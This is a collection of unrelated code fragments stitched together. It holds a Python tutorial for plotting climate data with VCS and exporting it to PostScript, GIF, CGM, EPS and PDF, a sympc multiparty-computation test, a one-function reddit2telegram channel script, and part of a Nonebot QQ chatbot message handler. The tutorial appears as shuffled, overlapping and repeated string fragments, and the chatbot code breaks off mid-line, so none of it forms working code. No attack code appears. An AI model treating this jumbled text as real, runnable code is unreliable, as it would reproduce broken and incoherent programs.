"############################################################## v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf',", "output orientation. # ############################################################## # Append to a postscript file v.postscript('test.ps') # Overwrite", "- Operation System routines for Mac, DOS, NT, or Posix depending on #", "# GhostScript (gs) file types (also known as devices). To view other #", "v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs)", "module provides access to some objects used or maintained by # the interpreter", "print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to file", "- overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait", "cdutil, time, os, sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile", ") # Extract a 3 dimensional data set data = cdmsfile('clt') # Initialize", "image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing cgm file", "to file # \"Landscape\" is the default output orientation. # ############################################################## # Append", "To view other # GhostScript devices, issue the command \"gs --help\" at the", "in one of the many # GhostScript (gs) file types (also known as", "# GIF format - overwrite gif image(s) output with portriat gif image v.gif('test.gif',", "variables. # time - This module provides various functions to mainpulate time values.", "the VCS canvas in one of the many # GhostScript (gs) file types", "data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract", "plot of the data v.plot( data ) # Changing plot orientation to \"Portrait\"", "v.plot( data ) # Changing plot orientation to \"Portrait\" v.portrait() # To change", "various functions to mainpulate time values. # os - Operation System routines for", "geometry='800x600') # CGM format - append to an existing cgm file v.cgm('test.cgm', 'a')", "gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append to an", "interact strongly with the interpreter. import vcs, cdms2 as cdms, cdutil, time, os,", "v.open() # A quick plot of the data v.plot( data ) # Changing", "# A quick plot of the data v.plot( data ) # Changing plot", "('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This routine allows the user", "user to save the VCS canvas in one of the many # GhostScript", "or maintained by # the interpreter and to functions that interact strongly with", "format - overwrite gif image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p',", "Changing plot orientation to \"Portrait\" v.portrait() # To change the orientation back to", "This module provides various functions to mainpulate time values. # os - Operation", "time values. # os - Operation System routines for Mac, DOS, NT, or", "# sys - This module provides access to some objects used or maintained", "plot command! v.open() # A quick plot of the data v.plot( data )", "\"Landscape\" is the default output orientation. # ############################################################## # Append to a postscript", "Append postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file", "many # GhostScript (gs) file types (also known as devices). To view other", "objects used or maintained by # the interpreter and to functions that interact", "'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format", "to do this # before issuing the plot command! v.open() # A quick", "by # the interpreter and to functions that interact strongly with the interpreter.", "v.portrait() # To change the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape", "orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait()", "on. # sys - This module provides access to some objects used or", "postscript file with a new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite", "# PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This", "existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript - overwrite an existing eps", "routines for # manipulating variables. # time - This module provides various functions", "\"Portrait\" orientation graphics to file # ############################################################## # Append postscript output to an", "file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output with portriat gif", "plotting routines. # cdutil - Climate utilitizes that contains miscellaneous routines for #", "PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This routine", "Climate utilitizes that contains miscellaneous routines for # manipulating variables. # time -", "postscript file v.postscript('test.ps') # GIF format - append landscape orientation gif image v.gif('test.gif',", "a 3 dimensional data set data = cdmsfile('clt') # Initialize VCS: v =", "the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # #", "one of the many # GhostScript (gs) file types (also known as devices).", "Initialize VCS: v = vcs.init() # Opening a VCS Canvas - not necessary", "############################################################## # # Saving \"Portrait\" orientation graphics to file # ############################################################## # Append", "to functions that interact strongly with the interpreter. import vcs, cdms2 as cdms,", "device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait", "back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\"", "overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output", "- append to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript -", "orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\"", "landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append", "v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') # GIF format - append", "# Import the modules needed for the tuturial # cdms - Climate Data", "this # before issuing the plot command! v.open() # A quick plot of", "provides various functions to mainpulate time values. # os - Operation System routines", "Encapsulated Postscript - overwrite an existing eps file v.eps('test.eps', 'r') # PDF format", "the command \"gs --help\" at the terminal # prompt. ############################################################### v.gs(filename='example.jpg', device='jpeg', orientation='p',", "# GhostScript devices, issue the command \"gs --help\" at the terminal # prompt.", "Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to file # ##############################################################", "merge='r', orientation='p', geometry='800x600') # CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r')", "or Posix depending on # the system you're on. # sys - This", "append portait output to an existing eps file. v.eps('test.eps', 'a', 'p') # PDF", "time, os, sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile =", "file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') # GIF format -", "existing postscript file with a new postscript file v.postscript('test.ps','r','p') # GIF format -", "Overwrite the existing postscript file v.postscript('test.ps') # GIF format - append landscape orientation", "Management system accesses gridded data. # vcs - Visualization and control System 1D", "to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation", "Encapsulated Postscript - append portait output to an existing eps file. v.eps('test.eps', 'a',", "This routine allows the user to save the VCS canvas in one of", "\"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to file #", "a new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output", "format - append to an existing cgm file v.cgm('test.cgm', 'a') # Encapsulated Postscript", "the tuturial # cdms - Climate Data Management system accesses gridded data. #", "the existing postscript file v.postscript('test.ps') # GIF format - append landscape orientation gif", "# GIF format - append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600')", "# ############################################################## # Append to a postscript file v.postscript('test.ps') # Overwrite the existing", "Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation graphics to file # \"Landscape\"", "PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format # This routine allows the", "# ############################################################## # Append postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite", "v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output to an existing eps", ") # Changing plot orientation to \"Portrait\" v.portrait() # To change the orientation", "to an existing eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf',", "# \"Landscape\" is the default output orientation. # ############################################################## # Append to a", "# Saving \"Portrait\" orientation graphics to file # ############################################################## # Append postscript output", "file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ############################################################### # GhostScript", "a postscript file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') # GIF", "# CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript", "that contains miscellaneous routines for # manipulating variables. # time - This module", "existing postscript file v.postscript('test.ps') # GIF format - append landscape orientation gif image", "= cdms.open( filepath ) # Extract a 3 dimensional data set data =", "view other # GhostScript devices, issue the command \"gs --help\" at the terminal", "the user to save the VCS canvas in one of the many #", "data = cdmsfile('clt') # Initialize VCS: v = vcs.init() # Opening a VCS", "an existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript", "functions that interact strongly with the interpreter. import vcs, cdms2 as cdms, cdutil,", "To change the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ##############################################################", "cdms2 as cdms, cdutil, time, os, sys # Open data file: filepath =", "new postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output with", "orientation='l', resolution='200x200') # Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\"", "to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## # # Saving \"Landscape\" orientation", "file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new postscript file v.postscript('test.ps','r','p')", "format - overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append", "Append to a postscript file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps')", "# cdutil - Climate utilitizes that contains miscellaneous routines for # manipulating variables.", "- append portait output to an existing eps file. v.eps('test.eps', 'a', 'p') #", "needed for the tuturial # cdms - Climate Data Management system accesses gridded", "an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new postscript", "# vcs - Visualization and control System 1D and 2D plotting routines. #", "orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') # CGM format - append to", "v.portrait() print \"Generating Portrait output...\" ############################################################## # # Saving \"Portrait\" orientation graphics to", "existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript - append portait output to", "# This routine allows the user to save the VCS canvas in one", "graphics to file # \"Landscape\" is the default output orientation. # ############################################################## #", "GhostScript devices, issue the command \"gs --help\" at the terminal # prompt. ###############################################################", "# Encapsulated Postscript - append portait output to an existing eps file. v.eps('test.eps',", "routines. # cdutil - Climate utilitizes that contains miscellaneous routines for # manipulating", "--help\" at the terminal # prompt. ############################################################## v.gs('example') # defaults: device='png256', orientation='l' and", "############################################################## # GhostScript (gs) format # This routine allows the user to save", "import vcs, cdms2 as cdms, cdutil, time, os, sys # Open data file:", "orientation. # ############################################################## # Append to a postscript file v.postscript('test.ps') # Overwrite the", "module provides various functions to mainpulate time values. # os - Operation System", "the interpreter. import vcs, cdms2 as cdms, cdutil, time, os, sys # Open", "interpreter. import vcs, cdms2 as cdms, cdutil, time, os, sys # Open data", "data. # vcs - Visualization and control System 1D and 2D plotting routines.", "############################################################## # Append to a postscript file v.postscript('test.ps') # Overwrite the existing postscript", "existing file v.postscript('test.ps','a','p') # Overwrite existing postscript file with a new postscript file", "for Mac, DOS, NT, or Posix depending on # the system you're on.", "This module provides access to some objects used or maintained by # the", "GhostScript (gs) file types (also known as devices). To view other # GhostScript", "overwrite gif image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') #", "'r') # Encapsulated Postscript - append portait output to an existing eps file.", "is the default output orientation. # ############################################################## # Append to a postscript file", "############################################################### # GhostScript (gs) format # This routine allows the user to save", "GIF format - overwrite gif image(s) output with portriat gif image v.gif('test.gif', merge='r',", "v.gs('example') # defaults: device='png256', orientation='l' and resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite',", "# time - This module provides various functions to mainpulate time values. #", "filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a 3", "resolution='792x612' v.gs(filename='example.tif', device='tiffpack', orientation='l', resolution='800x600') v.gs(filename='example.pdf', device='pdfwrite', orientation='l', resolution='200x200') # Changing plot orientation", "change the orientation back to \"Landscape\" v.landscape() print \"Generating Landscape output...\" ############################################################## #", "Postscript - append portait output to an existing eps file. v.eps('test.eps', 'a', 'p')", "- Climate Data Management system accesses gridded data. # vcs - Visualization and", "devices, issue the command \"gs --help\" at the terminal # prompt. ############################################################### v.gs(filename='example.jpg',", "overwrite an existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## #", "strongly with the interpreter. import vcs, cdms2 as cdms, cdutil, time, os, sys", "v.pdf ('test.pdf', 'p') ############################################################### # GhostScript (gs) format # This routine allows the", "# Extract a 3 dimensional data set data = cdmsfile('clt') # Initialize VCS:", "file: filepath = os.path.join(vcs.sample_data, 'clt.nc') cdmsfile = cdms.open( filepath ) # Extract a", "eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ############################################################## # GhostScript (gs) format", "Mac, DOS, NT, or Posix depending on # the system you're on. #", "gif image(s) output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM", "existing eps file. v.eps('test.eps', 'a', 'p') # PDF format v.pdf ('test.pdf', 'p') ###############################################################", "geometry='800x600') # CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated", "GIF format - append landscape orientation gif image v.gif('test.gif', merge='a', orientation='l', geometry='800x600') #", "postscript file v.postscript('test.ps','r','p') # GIF format - overwrite gif image(s) output with portriat", "\"Landscape\" orientation graphics to file # \"Landscape\" is the default output orientation. #", "CGM format - overwrite existing cgm file v.cgm('test.cgm', 'r') # Encapsulated Postscript -", "cdms.open( filepath ) # Extract a 3 dimensional data set data = cdmsfile('clt')", "cdms, cdutil, time, os, sys # Open data file: filepath = os.path.join(vcs.sample_data, 'clt.nc')", "and 2D plotting routines. # cdutil - Climate utilitizes that contains miscellaneous routines", "by convertcdms.py # Import the modules needed for the tuturial # cdms -", "# Overwrite the existing postscript file v.postscript('test.ps') # GIF format - append landscape", "# Append postscript output to an existing file v.postscript('test.ps','a','p') # Overwrite existing postscript", "Saving \"Portrait\" orientation graphics to file # ############################################################## # Append postscript output to", "- overwrite an existing eps file v.eps('test.eps', 'r') # PDF format v.pdf('test.pdf') ##############################################################", "to \"Portrait\" v.portrait() # To change the orientation back to \"Landscape\" v.landscape() print", "# Adapted for numpy/ma/cdms2 by convertcdms.py # Import the modules needed for the", "to a postscript file v.postscript('test.ps') # Overwrite the existing postscript file v.postscript('test.ps') #", "utilitizes that contains miscellaneous routines for # manipulating variables. # time - This", "- This module provides various functions to mainpulate time values. # os -", "output with portriat gif image v.gif('test.gif', merge='r', orientation='p', geometry='800x600') # CGM format -", "file # ############################################################## # Append postscript output to an existing file v.postscript('test.ps','a','p') #", "A quick plot of the data v.plot( data ) # Changing plot orientation", "the interpreter and to functions that interact strongly with the interpreter. import vcs,", "(also known as devices). To view other # GhostScript devices, issue the command", "functions to mainpulate time values. # os - Operation System routines for Mac,", "DOS, NT, or Posix depending on # the system you're on. # sys", "merge='a', orientation='l', geometry='800x600') # CGM format - append to an existing cgm file", "default output orientation. # ############################################################## # Append to a postscript file v.postscript('test.ps') #", "# Changing plot orientation to \"Portrait\" v.portrait() print \"Generating Portrait output...\" ############################################################## #" ]
[ "test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon)", "import Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) ->", "= (1,) shape_y = (1,) # create an inconsistent sharing,invoke a prrs first", "import pytest from sympc.protocol import Falcon from sympc.session import Session from sympc.session import", "CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session =", "SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create an inconsistent sharing,invoke a", "= (1,) # create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError):", "session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\": shape_x, \"b_shape\": shape_y}, )", "Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None:", "SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon", "sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\")", "import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3)", "session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create", "sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties =", "shape_x = (1,) shape_y = (1,) # create an inconsistent sharing,invoke a prrs", "with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\":", "g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\": shape_x, \"b_shape\":", "protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create an inconsistent sharing,invoke", "def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties,", "-> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session)", "(1,) # create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives(", "sympc.session import Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients)", "<gh_stars>10-100 # third party # third party import pytest from sympc.protocol import Falcon", "first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\":", "# third party import pytest from sympc.protocol import Falcon from sympc.session import Session", "from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties", "= get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,)", "party # third party import pytest from sympc.protocol import Falcon from sympc.session import", "\"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\":", "# third party # third party import pytest from sympc.protocol import Falcon from", "falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y =", "prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x,", "CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, },", "sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session,", "\"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\": shape_x, \"b_shape\": shape_y},", "sympc.protocol import Falcon from sympc.session import Session from sympc.session import SessionManager from sympc.store", "= Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,)", "inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\":", "# create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\",", "an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={", "session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y,", "import Falcon from sympc.session import Session from sympc.session import SessionManager from sympc.store import", "a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\":", "Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) #", "session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties, }, p_kwargs={\"a_shape\": shape_x,", "from sympc.store import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon =", "import CryptoPrimitiveProvider def test_rst_invalid_triple(get_clients) -> None: parties = get_clients(3) falcon = Falcon(\"malicious\") session", "parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x =", "from sympc.protocol import Falcon from sympc.session import Session from sympc.session import SessionManager from", "None: parties = get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x", "shape_y = (1,) # create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with", "third party import pytest from sympc.protocol import Falcon from sympc.session import Session from", "(1,) shape_y = (1,) # create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x)", "pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session, g_kwargs={ \"session\": session, \"a_shape\": shape_x, \"b_shape\": shape_y, \"nr_parties\": session.nr_parties,", "Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create an inconsistent", "party import pytest from sympc.protocol import Falcon from sympc.session import Session from sympc.session", "create an inconsistent sharing,invoke a prrs first session.session_ptrs[0].prrs_generate_random_share(shape_x) with pytest.raises(ValueError): CryptoPrimitiveProvider.generate_primitives( \"beaver_mul\", session=session,", "get_clients(3) falcon = Falcon(\"malicious\") session = Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y", "from sympc.session import Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider def", "= Session(parties, protocol=falcon) SessionManager.setup_mpc(session) shape_x = (1,) shape_y = (1,) # create an", "Falcon from sympc.session import Session from sympc.session import SessionManager from sympc.store import CryptoPrimitiveProvider", "third party # third party import pytest from sympc.protocol import Falcon from sympc.session", "pytest from sympc.protocol import Falcon from sympc.session import Session from sympc.session import SessionManager" ]
[]
[ "<filename>reddit2telegram/channels/ani_bm/app.py #encoding:utf-8 subreddit = 'ani_bm' t_channel = '@ani_bm' def send_post(submission, r2t): return r2t.send_simple(submission)" ]
[ "or isinstance(response, ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response,", "and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'],", "except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs)) except SyntaxError: await session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output))", "= msg_left else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif isinstance(response,", "'share', 'reply']: request.echo = True request.msg = f\"【NonebotPorter】不支持的消息段[{message['type']}]:\" \\ f\"{str(message).replace('CQ:', '$CQ$:')}\" continue #", "request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot')", "message['type'] == 'image' and request.img is None: # 先不下载图片,获取response时下载 request.img = message['data']['url'] #", "'lzy', '林子逸', '子兔', 'xsx', '小石像'] bot_called = False if request.user_id == self_id: logging.debug('===========", "== 'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face',", "空文本检测 if text != '': request.msg = text elif message['type'] == 'image' and", "try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg = response.text for at_id in", "on_command from nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses", "Request() request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬',", "os, logging, traceback # BLACKLIST = [3288849221] BLACKLIST = [] @on_natural_language(only_to_me=False, only_short_message=False, allow_empty_message=True)", "for response in response_list: try: if isinstance(response, ResponseMsg) or isinstance(response, ResponseGrpMsg): msg =", "nonebot import on_natural_language, NLPSession, IntentCommand from ....requests import Request from ....responses import *", "ResponseGrpImg): # 需要在盘符之后加入一个反斜杠,并且不使用双引号 img_msg = '[CQ:image,file=file:///%s]' % os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await", "% os.path.abspath(response.file).replace(':', ':\\\\') if isinstance(response, ResponseImg): await session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif", "# 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行", "== 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file']) elif", "import Distributor from ....utils import image_url_to_path from ....paths import PATHS import os, logging,", "msg = msg_left else: msg = '' elif isinstance(response, ResponseMusic): await session.send(message=f'[CQ:music,type={response.platform},id={response.music_id}]') elif", "= str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy', '林子逸', '子兔', 'xsx', '小石像']", "msg超出maxL的部分 msg = msg[:max_length] # msg只保留maxL内的部分 if isinstance(response, ResponseMsg): # 私聊 await session.send(message=msg)", "先不下载图片,获取response时下载 request.img = message['data']['url'] # request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record'", "distributor = Distributor() # 获取Response序列,同时下载图片,若出错则返回错误信息 def get_responses(): if request.img: request.img = image_url_to_path(request.img, header='QQBot')", "continue # 空文本检测 if text != '': request.msg = text elif message['type'] ==", "await execute(response_list=get_responses()) else: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return # 刷新并保存最新的session信息 distributor.refresh_and_save()", "from ....distributor import Distributor from ....utils import image_url_to_path from ....paths import PATHS import", "'[CQ:at,qq={}]'.format(self_id) in session.ctx['raw_message']: # 被at时 bot_called = True if 'group_id' in session.ctx.keys(): request.group_id", "message['type'] == 'record' and request.aud is None: request.aud = os.path.join(PATHS['cqhttp'], 'data', 'voices', message['data']['file'])", "response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' % str(response.kwargs))", "await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if bot_called: #", "for name in self_names: if name in text: # 被叫到时 bot_called = True", "'【NonebotPorter】不支持的消息段:\"%s\"' % text continue # 空文本检测 if text != '': request.msg = text", "bot_called: # 符合呼出条件的,直接执行 await execute(response_list=get_responses()) elif distributor.use_active(request=request, save=False): # 不符合呼出条件的,若有活动Session对应,也可以执行 await execute(response_list=get_responses()) else:", "request.platform = 'CQ' request.user_id = str(session.ctx['user_id']) self_id = str(session.self_id) self_names = ['韩大佬', 'lzy',", "msg = response.text for at_id in response.at_list: msg += '[CQ:at,qq=%s]' % str(at_id) #", "% response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await session.send('【NonebotPorter】不支持的参数:%s' %", "bot_called = False if request.user_id == self_id: logging.debug('=========== [MultiBot] Left nonebot porter ==========')", "await eval('session.bot.%s' % response.func_name)(**response.kwargs) except AttributeError: await session.send('【NonebotPorter】不支持的函数:%s' % response.func_name) except TypeError: await", "session.send('【NonebotPorter】语法错误') else: await execute(distributor.process_output(output=output)) # 递归处理新的Response序列 except: # 诸如发送失败等问题 logging.error(traceback.format_exc()) # 在筛选后,把Request交给分拣中心,执行返回的Response序列 if", "message in session.ctx['message']: if message['type'] == 'text' and request.msg is None: text =", "request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if '[CQ:at,qq={}]'.format(self_id) in", "return elif request.user_id in BLACKLIST: logging.debug('=========== [MultiBot] Left nonebot porter ==========') return if", "session.send(message=img_msg) else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s'", "else: await session.bot.send_group_msg(group_id=response.group_id, message=img_msg) elif isinstance(response, ResponseCQFunc): try: output = await eval('session.bot.%s' %", "request.img = image_url_to_path(message['data']['url'], header='QQBot') elif message['type'] == 'record' and request.aud is None: request.aud", "'location': request.loc = {'longitude': float(message['data']['lon']), 'latitude': float(message['data']['lat'])} elif message['type'] not in ['face', 'at',", "image_url_to_path(request.img, header='QQBot') response_list = distributor.handle(request=request) return response_list # 用于执行Response序列 async def execute(response_list: list):", "'$CQ$:')}\" continue # 